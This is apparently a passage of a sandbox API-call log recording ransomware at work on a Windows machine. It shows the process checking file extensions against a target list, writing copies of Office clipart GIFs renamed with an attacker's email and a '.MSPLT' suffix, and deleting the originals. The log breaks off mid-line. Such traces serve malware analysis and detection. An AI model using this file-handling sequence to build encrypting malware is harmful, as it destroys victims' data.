[0185.790] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.790] lstrlenW (lpString=".xlsx") returned 5 [0185.790] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.790] lstrlenW (lpString=".ppt") returned 4 [0185.790] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.790] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0185.790] lstrlenW (lpString=".zip") returned 4 [0185.790] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.790] lstrlenW (lpString=".rar") returned 4 [0185.790] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.790] lstrlenW (lpString=".bz2") returned 4 [0185.790] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.790] lstrlenW (lpString=".7z") returned 3 [0185.790] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0185.791] lstrlenW (lpString=".dbf") returned 4 [0185.791] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0185.791] lstrlenW (lpString=".1cd") returned 4 [0185.791] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0185.791] lstrlenW (lpString=".jpg") returned 4 [0185.791] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0185.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0185.791] lstrlenW (lpString=".doc") returned 4 [0185.791] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.791] lstrlenW (lpString=".docx") returned 5 [0185.791] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.791] lstrlenW (lpString=".pdf") returned 4 [0185.791] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.791] lstrlenW (lpString=".xls") returned 4 [0185.791] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.791] lstrlenW (lpString=".xlsx") returned 5 [0185.791] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.791] lstrlenW (lpString=".ppt") returned 4 [0185.791] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.791] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0185.791] lstrlenW (lpString=".zip") returned 4 [0185.791] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.791] lstrlenW (lpString=".rar") returned 4 [0185.791] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.791] lstrlenW (lpString=".bz2") returned 4 [0185.791] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.791] lstrlenW (lpString=".7z") returned 3 [0185.791] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0185.792] lstrlenW (lpString=".dbf") returned 4 [0185.792] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0185.792] lstrlenW (lpString=".1cd") returned 4 [0185.792] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.792] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00090_.GIF") returned 68 [0185.792] lstrlenW (lpString=".jpg") returned 4 [0185.792] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.792] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0185.792] lstrlenW (lpString="AG00126_.GIF") returned 12 [0185.792] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0185.792] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=3140) returned 1 [0185.792] CloseHandle (hObject=0x358) returned 1 [0185.792] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif")) returned 0x220 [0185.793] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0185.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0185.793] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.793] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0185.793] GetLastError () returned 0x0 [0185.793] ReadFile (in: hFile=0x358, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0xc44, lpOverlapped=0x0) returned 1 [0185.795] WriteFile (in: hFile=0x2fc, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xc50, lpOverlapped=0x0) returned 1 [0185.796] ReadFile (in: hFile=0x358, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.796] WriteFile (in: hFile=0x2fc, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.796] SetEndOfFile (hFile=0x2fc) returned 1 [0185.796] CloseHandle (hObject=0x2fc) returned 1 [0185.800] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.800] SetEndOfFile (hFile=0x358) returned 1 [0185.801] CloseHandle (hObject=0x358) returned 1 [0185.801] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0185.801] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00126_.gif")) returned 1 [0185.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0185.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0185.802] lstrlenW (lpString=".doc") returned 4 [0185.802] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.802] lstrlenW (lpString=".docx") returned 5 [0185.802] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.802] lstrlenW (lpString=".pdf") returned 4 [0185.802] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.802] lstrlenW (lpString=".xls") returned 4 [0185.802] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.802] lstrlenW (lpString=".xlsx") returned 5 [0185.802] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.802] lstrlenW (lpString=".ppt") returned 4 [0185.802] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0185.802] lstrlenW (lpString=".zip") returned 4 [0185.802] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.802] lstrlenW (lpString=".rar") returned 4 [0185.802] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.802] lstrlenW (lpString=".bz2") returned 4 [0185.802] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.802] lstrlenW (lpString=".7z") returned 3 [0185.802] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.802] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0185.802] lstrlenW (lpString=".dbf") returned 4 [0185.803] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0185.803] lstrlenW (lpString=".1cd") returned 4 [0185.803] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0185.803] lstrlenW (lpString=".jpg") returned 4 [0185.803] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0185.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0185.803] lstrlenW (lpString=".doc") returned 4 [0185.803] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.803] lstrlenW (lpString=".docx") returned 5 [0185.803] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.803] lstrlenW (lpString=".pdf") returned 4 [0185.803] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.803] lstrlenW (lpString=".xls") returned 4 [0185.803] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.803] lstrlenW (lpString=".xlsx") returned 5 [0185.803] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.803] lstrlenW (lpString=".ppt") returned 4 [0185.803] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0185.803] lstrlenW (lpString=".zip") returned 4 [0185.803] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.803] lstrlenW (lpString=".rar") returned 4 [0185.803] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.803] lstrlenW (lpString=".bz2") returned 4 [0185.803] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.803] lstrlenW (lpString=".7z") returned 3 [0185.803] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.803] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0185.803] lstrlenW (lpString=".dbf") returned 4 [0185.803] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0185.804] lstrlenW (lpString=".1cd") returned 4 [0185.804] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.804] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 68 [0185.804] lstrlenW (lpString=".jpg") returned 4 [0185.804] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.804] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0185.804] lstrlenW (lpString="AG00129_.GIF") returned 12 [0185.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0185.813] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=12482) returned 1 [0185.814] CloseHandle (hObject=0x384) returned 1 [0185.814] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif")) returned 0x220 [0185.814] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0185.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0185.814] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.814] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0185.816] GetLastError () returned 0x0 [0185.816] ReadFile (in: hFile=0x384, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x30c2, lpOverlapped=0x0) returned 1 [0185.820] WriteFile (in: hFile=0x350, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x30d0, lpOverlapped=0x0) returned 1 [0185.822] ReadFile (in: hFile=0x384, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0185.822] WriteFile (in: hFile=0x350, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xec, lpOverlapped=0x0) returned 1 [0185.822] SetEndOfFile (hFile=0x350) returned 1 [0185.823] CloseHandle (hObject=0x350) returned 1 [0185.828] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0185.828] SetEndOfFile (hFile=0x384) returned 1 [0185.829] CloseHandle (hObject=0x384) returned 1 [0185.830] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0185.830] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif")) returned 1 [0185.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0185.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0185.830] lstrlenW (lpString=".doc") returned 4 [0185.830] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.830] lstrlenW (lpString=".docx") returned 5 [0185.830] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.830] lstrlenW (lpString=".pdf") returned 4 [0185.831] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.831] lstrlenW (lpString=".xls") returned 4 [0185.831] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.831] lstrlenW (lpString=".xlsx") returned 5 [0185.831] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.831] lstrlenW (lpString=".ppt") returned 4 [0185.831] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0185.831] lstrlenW (lpString=".zip") returned 4 [0185.831] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.831] lstrlenW (lpString=".rar") returned 4 [0185.831] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.831] lstrlenW (lpString=".bz2") returned 4 [0185.831] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.831] lstrlenW (lpString=".7z") returned 3 [0185.831] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0185.831] lstrlenW (lpString=".dbf") returned 4 [0185.831] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0185.831] lstrlenW (lpString=".1cd") returned 4 [0185.831] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0185.831] lstrlenW (lpString=".jpg") returned 4 [0185.831] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0185.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0185.832] lstrlenW (lpString=".doc") returned 4 [0185.832] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0185.832] lstrlenW (lpString=".docx") returned 5 [0185.832] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0185.832] lstrlenW (lpString=".pdf") returned 4 [0185.832] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0185.832] lstrlenW (lpString=".xls") returned 4 [0185.832] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0185.832] lstrlenW (lpString=".xlsx") returned 5 [0185.832] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0185.832] lstrlenW (lpString=".ppt") returned 4 [0185.832] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0185.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0185.832] lstrlenW (lpString=".zip") returned 4 [0185.832] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0185.832] lstrlenW (lpString=".rar") returned 4 [0185.832] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0185.832] lstrlenW (lpString=".bz2") returned 4 [0185.832] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0185.832] lstrlenW (lpString=".7z") returned 3 [0185.832] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0185.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0185.832] lstrlenW (lpString=".dbf") returned 4 [0185.832] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0185.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0185.832] lstrlenW (lpString=".1cd") returned 4 [0185.832] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0185.833] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0185.833] lstrlenW (lpString=".jpg") returned 4 [0185.833] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0185.833] lstrcmpiW (lpString1=".GIF", lpString2=".MSPLT") returned -1 [0185.833] lstrlenW (lpString="AG00135_.GIF") returned 12 [0185.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0186.207] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=2596) returned 1 [0186.207] CloseHandle (hObject=0x390) returned 1 [0186.208] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif")) returned 0x220 [0186.208] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0186.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0186.208] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0186.208] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0186.208] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0186.208] GetLastError () returned 0x0 [0186.208] ReadFile (in: hFile=0x390, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0xa24, lpOverlapped=0x0) returned 1 [0186.271] WriteFile (in: hFile=0x394, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xa30, lpOverlapped=0x0) returned 1 [0186.272] ReadFile (in: hFile=0x390, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0186.273] WriteFile (in: hFile=0x394, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xec, lpOverlapped=0x0) returned 1 [0186.273] SetEndOfFile (hFile=0x394) returned 1 [0186.446] CloseHandle (hObject=0x394) returned 1 [0186.447] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0186.447] SetEndOfFile (hFile=0x390) returned 1 [0186.448] CloseHandle (hObject=0x390) returned 1 [0186.448] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0186.449] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00135_.gif")) returned 1 [0186.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0186.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 68 [0186.449] lstrlenW (lpString=".doc") returned 4 [0186.449] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0186.449] lstrlenW (lpString=".docx") returned 5 [0186.449] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0186.449] lstrlenW (lpString=".pdf") returned 4 [0186.449] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0186.449] lstrlenW (lpString=".xls") returned 4 [0186.449] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0186.449] lstrlenW (lpString=".xlsx") returned 5 [0186.449] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0186.449] lstrlenW (lpString=".ppt") returned 4 [0186.449] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0186.449] lstrlenW (lpString="C:\\Program 